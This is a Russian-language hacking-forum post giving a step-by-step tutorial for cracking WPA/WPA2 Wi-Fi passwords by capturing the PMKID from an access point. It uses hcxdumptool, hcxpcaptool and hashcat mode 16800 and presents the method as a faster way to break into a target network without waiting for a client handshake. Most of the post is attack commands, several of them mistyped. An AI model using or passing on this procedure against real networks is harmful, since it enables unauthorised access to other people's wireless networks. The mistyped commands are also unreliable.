Перейти к содержимому



Фотография
  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 roguevad

roguevad

    Эксперт.

  • Пользователи
  • PipPipPipPipPip
  • 442 сообщений

Отправлено 09 Май 2020 - 09:01

Всем привет, сегодня я хочу рассказать вам о новом способе взлома беспроводной точки доступа. Как уже многие могли убедиться, он является более эффективным чем те, что мы использовали раньше. Поэтому начем!

Способ в том, чтобы заполучить специальный ключ PMKID, что переводится как Pairwise Master Key Identifier.

Этот ключ позволяет узнать PSK – Pre-Shared Key, а именно он как раз-таки и является паролем от точки доступа. Вы спросите, чем же отличается данные метод от нам привычных? А тем, что нам не нужно получать полный хеншейк, и понадобится лишь один кадр EOPOL, ну а также еще одна отличительная черта - это то, что вам не нужно будет ждать, пока подключится какой-либо пользователь к сети, которую вы собираетесь атаковать. Связано это с тем, что атака будет производится на саму AP.

 

Необходимое для совершения атаки:

1. Linux

2. hcxtools

3. Hcxdumptool

4. Hashcat v4.2.0

 

Установка всего необходимого:

Hcstools устанавливается точно так же как и hcxdumprool

1. git clone ZerBea/hcxtools

2. cd hcxtools

3. make

4. make install

Hashcat v4.2.0

Если у вас уже присутствует эта программа, но она ниже указанной версии, то, к сожалению, или к счастью, вы будете вынуждены ее удалить, а потом установить более новою версию. Либо же обновить ее другими способами, ведь это необходимо по той причине, что прошлые версию не могут расшифровать PMKID.

1. git clone hashcat/hashcat

2. cd hashcat

3. make

4. make install

Сразу хочу сказать, для примера, я буду проводить атаку на собственный роутер, который имеет последнюю прошивку.

 

Перевод беспроводного интерфейса в режим монитора

Сделать это можно двумя методами, вот первый.

Пишем этот код:

airmon-ng start wlan0

airmon-ng check kill

 

Готово, теперь рассмотрим второй способ.

Пишем этот код:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng check kill

 

Запуск сканирования WiFi точек

Первым делом нам нужно запустить сканирование, сделать это можно данной командой:

airodump wlan0mon (wlan0 выбираем смотря из того, какой метод вы использовали)

После того как это будет выполнено, вам нужно будет сохранить BSSID необходимой точки AP без двоеточий в файл, сделать это можно с помощью такого кода:

echo "60A44C55D7C0" > filter.txt

 

Запуск Hcxdumptool

Запуск выполняется с помощью данной команды:

hcxdumptool –I wlan0 –o hash –filterlist=filter.txt --filtermode=2 -- enable_status=1

Теперь обо всем по порядку:

-i wlano – Эта строка указывает на название вашего интерфейса

-o hash – файл получаемый на выходе, в котором содержится PMKID

--filtermode=2 – укажет на то, что наш файл будет целевым списком

--filterlist=filter.txt – текстовый файл BSSID, который мы уже создали ранее.

--enable_status=1 – включения сообщний с помощью маски.

Теперь, когда вы все это запустите, то через некоторое время вам придет сообщение – Found PMKID, после этого мы отключаем данный скрипт. Что тут еще сказать? Данная программа на ура выполняет свои задачи и находит необходимые нам пакеты, поэтому продолжим.

 

Запуск hcxpcaptool

Для этого вводим команду:

hcxpcaptool –z hash_crack hash

Опять же расскажу, что это все значит:

-z hash_crack – это файл который мы получим нвыходе, где будет записан PMKID без лишнего мусора

Hash – файл в формате pcapng, в нем будут находится все найденые пакеты hcxdumptool

 

Запуск HASHCAT

Достаточно ввести эту команду:

hashcat –m 16800 –a 3 –w hash_crack ‘?u?s?d23456A’ --force

В этой команде я хочу сказать только про –m 16800, именно эта команда и появляется в новой версии HASHCAT

Итак, после этих действий вам будет выведет пароль по маске а также возможно два последних знака из данного пароля. Конечно, продолжать проверку больше суток я для примера не буду, поэтому введу несколько символов из своего пароля, после чего получил результат намного быстрее. А результатом как раз-таки был пароль.

На этом все, поэтому теперь можно сказать о том, что этот способ намного эффективнее других атак. Конечно скорость получения результата не так уж и сильно превосходит aircrack-ng, но если же вы имеет у себя в компьютере хорошую видеокарту, то с этим можно даже поспорить. А также, теперь вам не нужно ждать неопределенное количество временя в ожидании подключения пользователя, так как теперь не нужно будет перехватывать хеншейк.

 





Темы с аналогичным тегами программа, атака, wifi, вайфай, wi-fi, взлом, взломщик, хакер, хакинг, сеть, беспроводная сеть, точка доступа, роутер, интернет, уязвимость


Яндекс.Метрика Top.Mail.Ru Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal